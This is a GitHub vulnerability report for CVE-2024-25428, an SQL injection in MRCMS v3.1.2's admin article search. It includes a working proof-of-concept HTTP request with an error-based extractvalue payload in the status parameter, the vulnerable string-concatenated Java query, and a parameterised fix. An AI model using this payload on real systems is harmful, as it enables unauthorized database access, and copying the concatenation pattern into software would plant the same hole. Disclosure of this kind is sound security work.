MRCMS 3.1.2 has a SQL injection vulnerability #19

Open
xia0chensec opened this issue Feb 4, 2024 · 0 comments


xia0chensec commented Feb 4, 2024

[The name of an affected Product]

MRCMS

[The affected or fixed version]

v3.1.2

[CVE ID]
CVE-2024-25428

[Vulnerability Type]

SQL Injection

[Vulnerability Description]

MRCMS v3.1.2 is vulnerable to SQL injection via the status parameter.

[Vulnerability details]

The vulnerability exists at: http://localhost:8080/admin/article.do?cid=1&did=0&status=1&keyword=1&currentPageNo=1&pageSize=20

1. Select Content -> File management

2. Click the search button

SQL injection exists in the status parameter.

POC

```http
GET /admin/article.do?cid=1&did=0&status=1+and+extractvalue(1,concat(0x7e,(select+user()),0x7e))&keyword=1123&currentPageNo=1&pageSize=20 HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
X-Requested-With: XMLHttpRequest
Connection: close
Referer: http://localhost:8080/admin/index.do
Cookie: JSESSIONID=AD318CA555923823E93DC03659C2B5C0
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
```

Code discovery

Code path: MRCMS\src\main\java\org\marker\mushroom\service\impl\ArticleService.java

```java
public Page find(int currentPageNo, int pageSize, Map<String,Object> condition) {
    String keyword = (String) condition.get("keyword");
    String status = (String) condition.get("status");
    int cid = (Integer) condition.get("cid");
    int did = (Integer) condition.get("did");
    int userGroupId = (Integer) condition.get("userGroupId");
//  try {
//      keyword = new String(keyword.getBytes("ISO-8859-1"),"utf-8");
//  } catch (UnsupportedEncodingException e) {
//      e.printStackTrace();
//  }
    String prefix = config.getPrefix();

    // "status" comes straight from the request and is concatenated into the SQL text
    String sql = "select a.id,a.title, a.author,a.views,a.status, a.time, concat('/cms?type=article','&id=',CAST(a.id as char),'&time=',DATE_FORMAT(a.time,'%Y%m%d'))  url, c.name as cname ,'article' model, a.stick from "+config.getPrefix()+"article as a "
            + "left join "+prefix+"channel c on c.id = a.cid ";

    sql += "where a.status in ("+status+") ";
    if(userGroupId != 1){
        sql += " and a.cid in (select cid from "+prefix+"user_group_channel where gid = "+userGroupId+") ";
    }
```

In this code, the SQL query string is built through string concatenation, and there is a SQL injection risk at the status parameter.
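For reference, a hardened way to build the same `where a.status in (...)` clause. This is an added example, not MRCMS project code or a patch from the reporter; it assumes a plain JDBC `Connection` and that `prefix` is the configured table prefix from `config.getPrefix()`, not user input. The status list is parsed into integers and bound through `PreparedStatement` placeholders, so a value such as `1 and extractvalue(...)` is rejected before any SQL text is assembled.

```java
// Added example (not MRCMS code): parameterised replacement for the
// string-concatenated status filter in ArticleService.find().
import java.sql.Connection;
import java.sql.PreparedStatement;
import java.sql.SQLException;
import java.util.ArrayList;
import java.util.Collections;
import java.util.List;

public class SafeArticleQuery {

    // Parse the comma-separated "status" request parameter into integers.
    // Anything that is not a plain integer throws, so non-numeric input
    // never becomes part of the SQL string.
    static List<Integer> parseStatusList(String status) {
        if (status == null || status.trim().isEmpty()) {
            throw new IllegalArgumentException("status is required");
        }
        List<Integer> out = new ArrayList<>();
        for (String part : status.split(",")) {
            out.add(Integer.parseInt(part.trim())); // NumberFormatException on junk
        }
        return out;
    }

    // One "?" placeholder per value; the values themselves are bound below.
    static String placeholders(int n) {
        return String.join(",", Collections.nCopies(n, "?"));
    }

    // prefix is assumed to come from application config, not from the request.
    static PreparedStatement prepareFind(Connection conn, String prefix,
                                         String status, int userGroupId) throws SQLException {
        List<Integer> statuses = parseStatusList(status);
        String sql = "select a.id, a.title, a.author, a.views, a.status, a.time, a.stick, c.name as cname"
                + " from " + prefix + "article as a"
                + " left join " + prefix + "channel c on c.id = a.cid"
                + " where a.status in (" + placeholders(statuses.size()) + ")";
        if (userGroupId != 1) {
            sql += " and a.cid in (select cid from " + prefix + "user_group_channel where gid = ?)";
        }
        PreparedStatement ps = conn.prepareStatement(sql);
        int i = 1;
        for (Integer s : statuses) {
            ps.setInt(i++, s);
        }
        if (userGroupId != 1) {
            ps.setInt(i, userGroupId);
        }
        return ps;
    }
}
```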
